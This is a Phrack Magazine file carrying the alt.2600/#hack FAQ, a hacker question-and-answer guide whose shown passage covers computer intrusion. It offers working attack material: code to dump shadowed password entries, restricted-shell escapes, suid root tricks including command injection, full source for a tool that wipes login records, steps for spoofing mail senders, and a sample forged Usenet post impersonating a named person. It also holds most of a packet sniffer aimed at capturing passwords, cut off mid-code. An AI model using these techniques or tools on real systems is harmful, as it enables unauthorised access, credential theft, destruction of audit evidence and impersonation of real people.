| ==Phrack Magazine== | |
| Volume Six, Issue Forty-Seven, File 5 of 22 | |
| Editors Note: Welcome to special release of the alt.2600/#hack FAQ for | |
| Phrack Magazine! | |
| The purpose of this FAQ is to give you a general | |
| introduction to the topics covered on alt.2600 and | |
| #hack. No document will make you a hacker. | |
| If you have a question regarding any of the topics | |
| covered in the FAQ, please direct it to alt.2600 or | |
| #hack. Please do not e-mail me with them, I'm getting | |
| swamped. | |
| If your copy of the alt.2600/#hack FAQ does not end with | |
| the letters EOT on a line by themselves, you do not have | |
| the entire FAQ. | |
| The | |
| alt.2600/#Hack F.A.Q. | |
| Special release for Phrack Magazine | |
| A TNO Communication Production | |
| by | |
| Voyager | |
| will@gnu.ai.mit.edu | |
| Sysop of | |
| Hacker's Haven | |
| (303)343-4053 | |
| With greets going out to: | |
| A-Flat, Al, Aleph1, Bluesman, Cavalier, C-Curve, DeadKat, | |
| Disorder, Edison, Erik Bloodaxe, Hobbit, KCrow, Major, | |
| Marauder, Novocain, Outsider, Presence, Rogue Agent, sbin, | |
| Taran King, Theora, ThePublic, Tomes and TheSaint. | |
| We work in the dark | |
| We do what we can | |
| We give what we have | |
| Our doubt is our passion, | |
| and our passion is our task | |
| The rest is the madness of art. | |
| -- Henry James | |
| Section A: Computers | |
| 01. How do I access the password file under Unix? | |
| 02. How do I crack Unix passwords? | |
| 03. What is password shadowing? | |
| 04. Where can I find the password file if it's shadowed? | |
| 05. What is NIS/yp? | |
| 06. What are those weird characters after the comma in my passwd file? | |
| 07. How do I access the password file under VMS? | |
| 08. How do I crack VMS passwords? | |
| 09. How do I break out of a restricted shell? | |
| 10. How do I gain root from a suid script or program? | |
| 11. How do I erase my presence from the system logs? | |
| 12. How do I send fakemail? | |
| 13. How do I fake posts to UseNet? | |
| 14. How do I hack ChanOp on IRC? | |
| 15. How do I modify the IRC client to hide my real username? | |
| 16. How to I change to directories with strange characters in them? | |
| 17. What is ethernet sniffing? | |
| 18. What is an Internet Outdial? | |
| 19. What are some Internet Outdials? | |
| 20. What is this system? | |
| 21. What are the default accounts for XXX ? | |
| 22. What port is XXX on? | |
| 23. What is a trojan/worm/virus/logic bomb? | |
| 24. How can I protect myself from viruses and such? | |
| 25. Where can I get more information about viruses? | |
| 26. What is Cryptoxxxxxxx? | |
| 27. What is PGP? | |
| 28. What is Tempest? | |
| 29. What is an anonymous remailer? | |
| 30. What are the addresses of some anonymous remailers? | |
| 31. How do I defeat copy protection? | |
| 32. What is 127.0.0.1? | |
| 33. How do I post to a moderated newsgroup? | |
| Section B: Telephony | |
| 01. What is a Red Box? | |
| 02. How do I build a Red Box? | |
| 03. Where can I get a 6.5536Mhz crystal? | |
| 04. Which payphones will a Red Box work on? | |
| 05. How do I make local calls with a Red Box? | |
| 06. What is a Blue Box? | |
| 07. Do Blue Boxes still work? | |
| 08. What is a Black Box? | |
| 09. What do all the colored boxes do? | |
| 10. What is an ANAC number? | |
| 11. What is the ANAC number for my area? | |
| 12. What is a ringback number? | |
| 13. What is the ringback number for my area? | |
| 14. What is a loop? | |
| 15. What is a loop in my area? | |
| 16. What is a CNA number? | |
| 17. What is the telephone company CNA number for my area? | |
| 18. What are some numbers that always ring busy? | |
| 19. What are some numbers that temporarily disconnect phone service? | |
| 20. What is scanning? | |
| 21. Is scanning illegal? | |
| 22. Where can I purchase a lineman's handset? | |
| 23. What are the DTMF frequencies? | |
| 24. What are the frequencies of the telephone tones? | |
| 25. What are all of the * (LASS) codes? | |
| 26. What frequencies do cordless phones operate on? | |
| 27. What is Caller-ID? | |
| 28. What is a PBX? | |
| 29. What is a VMB? | |
| Section C: Resources | |
| 01. What are some ftp sites of interest to hackers? | |
| 02. What are some fsp sites of interest to hackers? | |
| 03. What are some newsgroups of interest to hackers? | |
| 04. What are some telnet sites of interest to hackers? | |
| 05. What are some gopher sites of interest to hackers? | |
| 06. What are some World wide Web (WWW) sites of interest to hackers? | |
| 07. What are some IRC channels of interest to hackers? | |
| 08. What are some BBS's of interest to hackers? | |
| 09. What are some books of interest to hackers? | |
| 10. What are some videos of interest to hackers? | |
| 11. What are some mailing lists of interest to hackers? | |
| 12. What are some print magazines of interest to hackers? | |
| 13. What are some e-zines of interest to hackers? | |
| 14. What are some organizations of interest to hackers? | |
| 15. Where can I purchase a magnetic stripe encoder/decoder? | |
| 16. What are the rainbow books and how can I get them? | |
| Section D: 2600 | |
| 01. What is alt.2600? | |
| 02. What does "2600" mean? | |
| 03. Are there on-line versions of 2600 available? | |
| 04. I can't find 2600 at any bookstores. What can I do? | |
| 05. Why does 2600 cost more to subscribe to than to buy at a newsstand? | |
| Section E: Phrack Magazine | |
| 01. What is Phrack Magazine? | |
| 02. How can I reach Phrack Magazine? | |
| 03. Who Publishes Phrack? | |
| 04. How often does Phrack go out? | |
| 05. How do I subscribe? | |
| 06. Why don't I get any response when I email Phrack? | |
| 07. Does Phrack cost money? | |
| 08. How can I submit articles? | |
| 09. What is Phrack's PGP key? | |
| 10. Where can I get back issues? | |
| Section F: Miscellaneous | |
| 01. What does XXX stand for? | |
| 02. How do I determine if I have a valid credit card number? | |
| 03. What bank issued this credit card? | |
| 04. What are the ethics of hacking? | |
| 05. Where can I get a copy of the alt.2600/#hack FAQ? | |
| Section A: Computers | |
| ~~~~~~~~~~~~~~~~~~~~ | |
| 01. How do I access the password file under Unix? | |
| In standard Unix the password file is /etc/passwd. On a Unix system | |
| with either NIS/yp or password shadowing, much of the password data | |
| may be elsewhere. | |
| 02. How do I crack Unix passwords? | |
| Contrary to popular belief, Unix passwords cannot be decrypted. Unix | |
| passwords are encrypted with a one way function. The login program | |
| encrypts the text you enter at the "password:" prompt and compares | |
| that encrypted string against the encrypted form of your password. | |
| Password cracking software uses wordlists. Each word in the wordlist | |
| is encrypted and the results are compared to the encrypted form of the | |
| target password. | |
| The best cracking program for Unix passwords is currently Crack by | |
| Alec Muffett. For PC-DOS, the best package to use is currently | |
| CrackerJack. | |
| 03. What is password shadowing? | |
| Password shadowing is a security system where the encrypted password | |
| field of /etc/passwd is replaced with a special token and the | |
| encrypted password is stored in a separate file which is not readable | |
| by normal system users. | |
| To defeat password shadowing on many (but not all) systems, write a | |
| program that uses successive calls to getpwent() to obtain the | |
| password file. | |
| Example: | |
| #include <pwd.h> | |
| main() | |
| { | |
| struct passwd *p; | |
| while(p=getpwent()) | |
| printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, | |
| p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); | |
| } | |
| 04. Where can I find the password file if it's shadowed? | |
| Unix Path Token | |
| ----------------------------------------------------------------- | |
| AIX 3 /etc/security/passwd ! | |
| or /tcb/auth/files/<first letter # | |
| of username>/<username> | |
| A/UX 3.0s /tcb/files/auth/?/* | |
| BSD4.3-Reno /etc/master.passwd * | |
| ConvexOS 10 /etc/shadpw * | |
| ConvexOS 11 /etc/shadow * | |
| DG/UX /etc/tcb/aa/user/ * | |
| EP/IX /etc/shadow x | |
| HP-UX /.secure/etc/passwd * | |
| IRIX 5 /etc/shadow x | |
| Linux 1.1 /etc/shadow * | |
| OSF/1 /etc/passwd[.dir|.pag] * | |
| SCO Unix #.2.x /tcb/auth/files/<first letter * | |
| of username>/<username> | |
| SunOS4.1+c2 /etc/security/passwd.adjunct ##username | |
| SunOS 5.0 /etc/shadow | |
| <optional NIS+ private secure maps/tables/whatever> | |
| System V Release 4.0 /etc/shadow x | |
| System V Release 4.2 /etc/security/* database | |
| Ultrix 4 /etc/auth[.dir|.pag] * | |
| UNICOS /etc/udb * | |
| 05. What is NIS/yp? | |
| NIS (Network Information System) in the current name for what was once | |
| known as yp (Yellow Pages). The purpose for NIS is to allow many | |
| machines on a network to share configuration information, including | |
| password data. NIS is not designed to promote system security. If | |
| your system uses NIS you will have a very short /etc/passwd file that | |
| includes a line that looks like this: | |
| +::0:0::: | |
| To view the real password file use this command "ypcat passwd" | |
| 06. What are those weird characters after the comma in my passwd file? | |
| The characters are password aging data. Password aging forces the | |
| user to change passwords after a System Administrator specified period | |
| of time. Password aging can also force a user to keep a password for | |
| a certain number of weeks before changing it. | |
| ] | |
| ] Sample entry from /etc/passwd with password aging installed: | |
| ] | |
| ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash | |
| ] | |
| Note the comma in the encrypted password field. The characters after | |
| the comma are used by the password aging mechanism. | |
| ] | |
| ] Password aging characters from above example: | |
| ] | |
| ] M.z8 | |
| ] | |
| The four characters are interpreted as follows: | |
| 1: Maximum number of weeks a password can be used without changing. | |
| 2: Minimum number of weeks a password must be used before changing. | |
| 3&4: Last time password was changed, in number of weeks since 1970. | |
| Three special cases should be noted: | |
| If the first and second characters are set to '..' the user will be | |
| forced to change his/her passwd the next time he/she logs in. The | |
| passwd program will then remove the passwd aging characters, and the | |
| user will not be subjected to password aging requirements again. | |
| If the third and fourth characters are set to '..' the user will be | |
| forced to change his/her passwd the next time he/she logs in. Password | |
| aging will then occur as defined by the first and second characters. | |
| If the first character (MAX) is less than the second character (MIN), | |
| the user is not allowed to change his/her password. Only root can | |
| change that users password. | |
| It should also be noted that the su command does not check the password | |
| aging data. An account with an expired password can be su'd to | |
| without being forced to change the password. | |
| Password Aging Codes | |
| +------------------------------------------------------------------------+ | |
| | | | |
| | Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H | | |
| | Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | | |
| | | | |
| | Character: I J K L M N O P Q R S T U V W X Y Z a b | | |
| | Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | | |
| | | | |
| | Character: c d e f g h i j k l m n o p q r s t u v | | |
| | Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | | |
| | | | |
| | Character: w x y z | | |
| | Number: 60 61 62 63 | | |
| | | | |
| +------------------------------------------------------------------------+ | |
| 07. How do I access the password file under VMS? | |
| Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However, | |
| unlike Unix, most users do not have access to read the password file. | |
| 08. How do I crack VMS passwords? | |
| Write a program that uses the SYS$GETUAF functions to compare the | |
| results of encrypted words against the encrypted data in SYSUAF.DAT. | |
| Two such programs are known to exist, CHECK_PASSWORD and | |
| GUESS_PASSWORD. | |
| 09. How do I break out of a restricted shell? | |
| On poorly implemented restricted shells you can break out of the | |
| restricted environment by running a program that features a shell | |
| function. A good example is vi. Run vi and use this command: | |
| :set shell=/bin/sh | |
| then shell using this command: | |
| :shell | |
| 10. How do I gain root from a suid script or program? | |
| 1. Change IFS. | |
| If the program calls any other programs using the system() function | |
| call, you may be able to fool it by changing IFS. IFS is the Internal | |
| Field Separator that the shell uses to delimit arguments. | |
| If the program contains a line that looks like this: | |
| system("/bin/date") | |
| and you change IFS to '/' the shell will them interpret the | |
| proceeding line as: | |
| bin date | |
| Now, if you have a program of your own in the path called "bin" the | |
| suid program will run your program instead of /bin/date. | |
| To change IFS, use this command: | |
| IFS='/';export IFS # Bourne Shell | |
| setenv IFS '/' # C Shell | |
| export IFS='/' # Korn Shell | |
| 2. link the script to -i | |
| Create a symbolic link named "-i" to the program. Running "-i" | |
| will cause the interpreter shell (/bin/sh) to start up in interactive | |
| mode. This only works on suid shell scripts. | |
| Example: | |
| % ln suid.sh -i | |
| % -i | |
| # | |
| 3. Exploit a race condition | |
| Replace a symbolic link to the program with another program while the | |
| kernel is loading /bin/sh. | |
| Example: | |
| nice -19 suidprog ; ln -s evilprog suidroot | |
| 4. Send bad input to the program. | |
| Invoke the name of the program and a separate command on the same | |
| command line. | |
| Example: | |
| suidprog ; id | |
| 11. How do I erase my presence from the system logs? | |
| Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text | |
| files that can be edited by hand with vi, you must use a program | |
| specifically written for this purpose. | |
| Example: | |
| #include <sys/types.h> | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <sys/file.h> | |
| #include <fcntl.h> | |
| #include <utmp.h> | |
| #include <pwd.h> | |
| #include <lastlog.h> | |
| #define WTMP_NAME "/usr/adm/wtmp" | |
| #define UTMP_NAME "/etc/utmp" | |
| #define LASTLOG_NAME "/usr/adm/lastlog" | |
| int f; | |
| void kill_utmp(who) | |
| char *who; | |
| { | |
| struct utmp utmp_ent; | |
| if ((f=open(UTMP_NAME,O_RDWR))>=0) { | |
| while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) | |
| if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { | |
| bzero((char *)&utmp_ent,sizeof( utmp_ent )); | |
| lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); | |
| write (f, &utmp_ent, sizeof (utmp_ent)); | |
| } | |
| close(f); | |
| } | |
| } | |
| void kill_wtmp(who) | |
| char *who; | |
| { | |
| struct utmp utmp_ent; | |
| long pos; | |
| pos = 1L; | |
| if ((f=open(WTMP_NAME,O_RDWR))>=0) { | |
| while(pos != -1L) { | |
| lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); | |
| if (read (f, &utmp_ent, sizeof (struct utmp))<0) { | |
| pos = -1L; | |
| } else { | |
| if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { | |
| bzero((char *)&utmp_ent,sizeof(struct utmp )); | |
| lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); | |
| write (f, &utmp_ent, sizeof (utmp_ent)); | |
| pos = -1L; | |
| } else pos += 1L; | |
| } | |
| } | |
| close(f); | |
| } | |
| } | |
| void kill_lastlog(who) | |
| char *who; | |
| { | |
| struct passwd *pwd; | |
| struct lastlog newll; | |
| if ((pwd=getpwnam(who))!=NULL) { | |
| if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { | |
| lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); | |
| bzero((char *)&newll,sizeof( newll )); | |
| write(f, (char *)&newll, sizeof( newll )); | |
| close(f); | |
| } | |
| } else printf("%s: ?\n",who); | |
| } | |
| main(argc,argv) | |
| int argc; | |
| char *argv[]; | |
| { | |
| if (argc==2) { | |
| kill_lastlog(argv[1]); | |
| kill_wtmp(argv[1]); | |
| kill_utmp(argv[1]); | |
| printf("Zap2!\n"); | |
| } else | |
| printf("Error.\n"); | |
| } | |
| 12. How do I send fakemail? | |
| Telnet to port 25 of the machine you want the mail to appear to | |
| originate from. Enter your message as in this example: | |
| HELO bellcore.com | |
| MAIL FROM:Voyager@bellcore.com | |
| RCPT TO:president@whitehouse.gov | |
| DATA | |
| Please discontinue your silly Clipper initiative. | |
| . | |
| QUIT | |
| On systems that have RFC 931 implemented, spoofing your "MAIL FROM:" | |
| line will not work. Test by sending yourself fakemail first. | |
| For more information read RFC 822 "Standard for the format of ARPA | |
| Internet text messages." | |
| 13. How do I fake posts to UseNet? | |
| Use inews to post. Give inews the following lines: | |
| From: | |
| Newsgroups: | |
| Subject: | |
| Message-ID: | |
| Date: | |
| Organization: | |
| For a moderated newsgroup, inews will also require this line: | |
| Approved: | |
| Then add your post and terminate with <Control-D>. | |
| Example: | |
| From: Eric S. Real | |
| Newsgroups: alt.hackers | |
| Subject: Pathetic bunch of wannabe losers | |
| Message-ID: <esr.123@locke.ccil.org> | |
| Date: Fri, 13 Aug 1994 12:15:03 | |
| Organization: Moral Majority | |
| A pathetic bunch of wannabe losers is what most of you are, with no | |
| right to steal the honorable title of `hacker' to puff up your silly | |
| adolescent egos. Get stuffed, get lost, and go to jail. | |
| Eric S. Real <esr@locke.ccil.org> | |
| ^D | |
| Note that many systems will append an Originator: line to your message | |
| header, effectively revealing the account from which the message was | |
| posted. | |
| 14. How do I hack ChanOp on IRC? | |
| Find a server that is split from the rest of IRC and create your own | |
| channel there using the name of the channel you want ChanOp on. When | |
| that server reconnects to the net, you will have ChanOp on the real | |
| channel. If you have ServerOp on a server, you can cause it to split | |
| on purpose. | |
| 15. How do I modify the IRC client to hide my real username? | |
| Get the IRC client from cs.bu.edu /irc/clients. Look at the source | |
| code files irc.c and ctcp.c. The code you are looking for is fairly | |
| easy to spot. Change it. Change the username code in irc.c and the | |
| ctcp information code in ctcp.c. Compile and run your client. | |
| Here are the diffs from a sample hack of the IRC client. Your client | |
| code will vary slightly depending on what IRC client version you are | |
| running. | |
| *** ctcp.c.old Wed Feb 10 10:08:05 1993 | |
| --- ctcp.c Fri Feb 12 04:33:55 1993 | |
| *************** | |
| *** 331,337 **** | |
| struct passwd *pwd; | |
| long diff; | |
| int uid; | |
| ! char c; | |
| /* | |
| * sojge complained that ircII says 'idle 1 seconds' | |
| --- 331,337 ---- | |
| struct passwd *pwd; | |
| long diff; | |
| int uid; | |
| ! char c, *fing; | |
| /* | |
| * sojge complained that ircII says 'idle 1 seconds' | |
| *************** | |
| *** 348,354 **** | |
| if (uid != DAEMON_UID) | |
| { | |
| #endif /* DAEMON_UID */ | |
| ! if (pwd = getpwuid(uid)) | |
| { | |
| char *tmp; | |
| --- 348,356 ---- | |
| if (uid != DAEMON_UID) | |
| { | |
| #endif /* DAEMON_UID */ | |
| ! if (fing = getenv("IRCFINGER")) | |
| ! send_ctcp_reply(from, ctcp->name, fing, diff, c); | |
| ! else if (pwd = getpwuid(uid)) | |
| { | |
| char *tmp; | |
| *** irc.c.old Wed Feb 10 06:33:11 1993 | |
| --- irc.c Fri Feb 12 04:02:11 1993 | |
| *************** | |
| *** 510,516 **** | |
| malloc_strcpy(&my_path, "/"); | |
| if (*realname == null(char)) | |
| strmcpy(realname, "*Unknown*", REALNAME_LEN); | |
| ! if (*username == null(char)) | |
| { | |
| if (ptr = getenv("USER")) | |
| strmcpy(username, ptr, NAME_LEN); | |
| --- 510,518 ---- | |
| malloc_strcpy(&my_path, "/"); | |
| if (*realname == null(char)) | |
| strmcpy(realname, "*Unknown*", REALNAME_LEN); | |
| ! if (ptr = getenv("IRCUSER")) | |
| ! strmcpy(username, ptr, NAME_LEN); | |
| ! else if (*username == null(char)) | |
| { | |
| if (ptr = getenv("USER")) | |
| strmcpy(username, ptr, NAME_LEN); | |
| 16. How to I change to directories with strange characters in them? | |
| These directories are often used by people trying to hide information, | |
| most often warez (commercial software). | |
| There are several things you can do to determine what these strange | |
| characters are. One is to use the arguments to the ls command that | |
| cause ls to give you more information: | |
| From the man page for ls: | |
| -F Causes directories to be marked with a trailing ``/'', | |
| executable files to be marked with a trailing ``*'', and | |
| symbolic links to be marked with a trailing ``@'' symbol. | |
| -q Forces printing of non-graphic characters in filenames as the | |
| character ``?''. | |
| -b Forces printing of non-graphic characters in the \ddd | |
| notation, in octal. | |
| Perhaps the most useful tool is to simply do an "ls -al filename" to | |
| save the directory of the remote ftp site as a file on your local | |
| machine. Then you can do a "cat -t -v -e filename" to see exactly | |
| what those bizarre little characters are. | |
| From the man page for cat: | |
| -v Causes non-printing characters (with the exception of tabs, | |
| newlines, and form feeds) to be displayed. Control characters | |
| are displayed as ^X (<Ctrl>x), where X is the key pressed with | |
| the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The | |
| <Del> character (octal 0177) is printed as ^?. Non-ASCII | |
| characters (with the high bit set) are printed as M -x, where | |
| x is the character specified by the seven low order bits. | |
| -t Causes tabs to be printed as ^I and form feeds as ^L. This | |
| option is ignored if the -v option is not specified. | |
| -e Causes a ``$'' character to be printed at the end of each line | |
| (prior to the new-line). This option is ignored if the -v | |
| option is not set. | |
| If the directory name includes a <SPACE> or a <TAB> you will need to | |
| enclose the entire directory name in quotes. Example: | |
| cd "..<TAB>" | |
| On an IBM-PC, you may enter these special characters by holding down | |
| the <ALT> key and entering the decimal value of the special character | |
| on your numeric keypad. When you release the <ALT> key, the special | |
| character should appear on your screen. An ASCII chart can be very | |
| helpful. | |
| Sometimes people will create directories with some of the standard | |
| stty control characters in them, such as ^Z (suspend) or ^C (intr). | |
| To get into those directories, you will first need to user stty to | |
| change the control character in qustion to another character. | |
| From the man page for stty: | |
| Control assignments | |
| control-character C | |
| Sets control-character to C, where control-character is | |
| erase, kill, intr (interrupt), quit, eof, eol, swtch | |
| (switch), start, stop or susp. | |
| start and stop are available as possible control char- | |
| acters for the control-character C assignment. | |
| If C is preceded by a caret (^) (escaped from the | |
| shell), then the value used is the corresponding con- | |
| trol character (for example, ^D is a <Ctrl>d; ^? is | |
| interpreted as DELETE and ^- is interpreted as unde- | |
| fined). | |
| Use the stty -a command to see your current stty settings, and to | |
| determine which one is causing you problems. | |
| 17. What is ethernet sniffing? | |
| Ethernet sniffing is listening (with software) to the raw ethernet | |
| device for packets that interest you. When your software sees a | |
| packet that fits certain criteria, it logs it to a file. The most | |
| common criteria for an interesting packet is one that contains words | |
| like "login" or "password." | |
| Many ethernet sniffers are available, here are a few that may be on | |
| your system now: | |
| OS Sniffer | |
| ~~ ~~~~~~~ | |
| HP/UX nettl (monitor) & netfmt (display) | |
| nfswatch /* Available via anonymous ftp */ | |
| Irix nfswatch /* Available via anonymous ftp */ | |
| Etherman | |
| SunOS etherfind | |
| nfswatch /* Available via anonymous ftp */ | |
| Solaris snoop | |
| DOS ETHLOAD /* Available via anonymous ftp as */ | |
| /* ethld104.zip */ | |
| The Gobbler /* Available via anonymous ftp */ | |
| LanPatrol | |
| LanWatch | |
| Netmon | |
| Netwatch | |
| Netzhack /* Available via anonymous ftp at */ | |
| /* mistress.informatik.unibw-muenchen.de */ | |
| /* /pub/netzhack.mac */ | |
| Macintosh Etherpeek | |
| Here is source code for an ethernet sniffer: | |
| /* Esniff.c */ | |
| #include <stdio.h> | |
| #include <ctype.h> | |
| #include <string.h> | |
| #include <sys/time.h> | |
| #include <sys/file.h> | |
| #include <sys/stropts.h> | |
| #include <sys/signal.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <sys/ioctl.h> | |
| #include <net/if.h> | |
| #include <net/nit_if.h> | |
| #include <net/nit_buf.h> | |
| #include <net/if_arp.h> | |
| #include <netinet/in.h> | |
| #include <netinet/if_ether.h> | |
| #include <netinet/in_systm.h> | |
| #include <netinet/ip.h> | |
| #include <netinet/udp.h> | |
| #include <netinet/ip_var.h> | |
| #include <netinet/udp_var.h> | |
| #include <netinet/in_systm.h> | |
| #include <netinet/tcp.h> | |
| #include <netinet/ip_icmp.h> | |
| #include <netdb.h> | |
| #include <arpa/inet.h> | |
| #define ERR stderr | |
| char *malloc(); | |
| char *device, | |
| *ProgName, | |
| *LogName; | |
| FILE *LOG; | |
| int debug=0; | |
| #define NIT_DEV "/dev/nit" | |
| #define CHUNKSIZE 4096 /* device buffer size */ | |
| int if_fd = -1; | |
| int Packet[CHUNKSIZE+32]; | |
| void Pexit(err,msg) | |
| int err; char *msg; | |
| { perror(msg); | |
| exit(err); } | |
| void Zexit(err,msg) | |
| int err; char *msg; | |
| { fprintf(ERR,msg); | |
| exit(err); } | |
| #define IP ((struct ip *)Packet) | |
| #define IP_OFFSET (0x1FFF) | |
| #define SZETH (sizeof(struct ether_header)) | |
| #define IPLEN (ntohs(ip->ip_len)) | |
| #define IPHLEN (ip->ip_hl) | |
| #define TCPOFF (tcph->th_off) | |
| #define IPS (ip->ip_src) | |
| #define IPD (ip->ip_dst) | |
| #define TCPS (tcph->th_sport) | |
| #define TCPD (tcph->th_dport) | |
| #define IPeq(s,t) ((s).s_addr == (t).s_addr) | |
| #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) | |
| #define MAXBUFLEN (128) | |
| time_t LastTIME = 0; | |
| struct CREC { | |
| struct CREC *Next, | |
| *Last; | |
| time_t Time; /* start time */ | |
| struct in_addr SRCip, | |
| DSTip; | |
| u_int SRCport, /* src/dst ports */ | |
| DSTport; | |
| u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ | |
| u_int Length; /* current data length */ | |
| u_int PKcnt; /* # pkts */ | |
| u_long LASTseq; | |
| }; | |
| struct CREC *CLroot = NULL; | |
| char *Symaddr(ip) | |
| register struct in_addr ip; | |
| { register struct hostent *he = | |
| gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); | |
| return( (he)?(he->h_name):(inet_ntoa(ip)) ); | |
| } | |
| char *TCPflags(flgs) | |
| register u_char flgs; | |
| { static char iobuf[8]; | |
| #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') | |
| SFL(0,TH_FIN, 'F'); | |
| SFL(1,TH_SYN, 'S'); | |
| SFL(2,TH_RST, 'R'); | |
| SFL(3,TH_PUSH,'P'); | |
| SFL(4,TH_ACK, 'A'); | |
| SFL(5,TH_URG, 'U'); | |
| iobuf[6]=0; | |
| return(iobuf); | |
| } | |
| char *SERVp(port) | |
| register u_int port; | |
| { static char buf[10]; | |
| register char *p; | |
| switch(port) { | |
| case IPPORT_LOGINSERVER: p="rlogin"; break; | |
| case IPPORT_TELNET: p="telnet"; break; | |
| case IPPORT_SMTP: p="smtp"; break; | |
| case IPPORT_FTP: p="ftp"; break; | |
| default: sprintf(buf,"%u",port); p=buf; break; | |
| } | |
| return(p); | |
| } | |
| char *Ptm(t) | |
| register time_t *t; | |
| { register char *p = ctime(t); | |
| p[strlen(p)-6]=0; /* strip " YYYY\n" */ | |
| return(p); | |
| } | |
| char *NOWtm() | |
| { time_t tm; | |
| time(&tm); | |
| return( Ptm(&tm) ); | |
| } | |
| #define MAX(a,b) (((a)>(b))?(a):(b)) | |
| #define MIN(a,b) (((a)<(b))?(a):(b)) | |
| /* add an item */ | |
| #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ | |
| register struct CREC *CLtmp = \ | |
| (struct CREC *)malloc(sizeof(struct CREC)); \ | |
| time( &(CLtmp->Time) ); \ | |
| CLtmp->SRCip.s_addr = SIP.s_addr; \ | |
| CLtmp->DSTip.s_addr = DIP.s_addr; \ | |
| CLtmp->SRCport = SPORT; \ | |
| CLtmp->DSTport = DPORT; \ | |
| CLtmp->Length = MIN(LEN,MAXBUFLEN); \ | |
| bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ | |
| CLtmp->PKcnt = 1; \ | |
| CLtmp->Next = CLroot; \ | |
| CLtmp->Last = NULL; \ | |
| CLroot = CLtmp; \ | |
| } | |
| register struct CREC *GET_NODE(Sip,SP,Dip,DP) | |
| register struct in_addr Sip,Dip; | |
| register u_int SP,DP; | |
| { register struct CREC *CLr = CLroot; | |
| while(CLr != NULL) { | |
| if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && | |
| IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) | |
| break; | |
| CLr = CLr->Next; | |
| } | |
| return(CLr); | |
| } | |
| #define ADDDATA_NODE(CL,DATA,LEN) { \ | |
| bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ | |
| CL->Length += LEN; \ | |
| } | |
| #define PR_DATA(dp,ln) { \ | |
| register u_char lastc=0; \ | |
| while(ln-- >0) { \ | |
| if(*dp < 32) { \ | |
| switch(*dp) { \ | |
| case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ | |
| break; \ | |
| case '\r': \ | |
| case '\n': fprintf(LOG,"\n : "); \ | |
| break; \ | |
| default : fprintf(LOG,"^%c", (*dp + 64)); \ | |
| break; \ | |
| } \ | |
| } else { \ | |
| if(isprint(*dp)) fputc(*dp,LOG); \ | |
| else fprintf(LOG,"(%d)",*dp); \ | |
| } \ | |
| lastc = *dp++; \ | |
| } \ | |
| fflush(LOG); \ | |
| } | |
| void END_NODE(CLe,d,dl,msg) | |
| register struct CREC *CLe; | |
| register u_char *d; | |
| register int dl; | |
| register char *msg; | |
| { | |
| fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); | |
| fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); | |
| fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); | |
| fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", | |
| NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); | |
| fprintf(LOG," DATA: "); | |
| { register u_int i = CLe->Length; | |
| register u_char *p = CLe->Data; | |
| PR_DATA(p,i); | |
| PR_DATA(d,dl); | |
| } | |
| fprintf(LOG,"\n-- \n"); | |
| fflush(LOG); | |
| if(CLe->Next != NULL) | |
| CLe->Next->Last = CLe->Last; | |
| if(CLe->Last != NULL) | |
| CLe->Last->Next = CLe->Next; | |
| else | |
| CLroot = CLe->Next; | |
| free(CLe); | |
| } | |
| /* 30 mins (x 60 seconds) */ | |
| #define IDLE_TIMEOUT 1800 | |
| #define IDLE_NODE() { \ | |
| time_t tm; \ | |
| time(&tm); \ | |
| if(LastTIME<tm) { \ | |
| register struct CREC *CLe,*CLt = CLroot; \ | |
| LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \ | |
| while(CLe=CLt) { \ | |
| CLt=CLe->Next; \ | |
| if(CLe->Time <tm) \ | |
| END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \ | |
| } \ | |
| } \ | |
| } | |
| void filter(cp, pktlen) | |
| register char *cp; | |
| register u_int pktlen; | |
| { | |
| register struct ip *ip; | |
| register struct tcphdr *tcph; | |
| { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type); | |
| if(EtherType < 0x600) { | |
| EtherType = *(u_short *)(cp + SZETH + 6); | |
| cp+=8; pktlen-=8; | |
| } | |
| if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ | |
| return; | |
| } | |
| /* ugh, gotta do an alignment :-( */ | |
| bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); | |
| ip = (struct ip *)Packet; | |
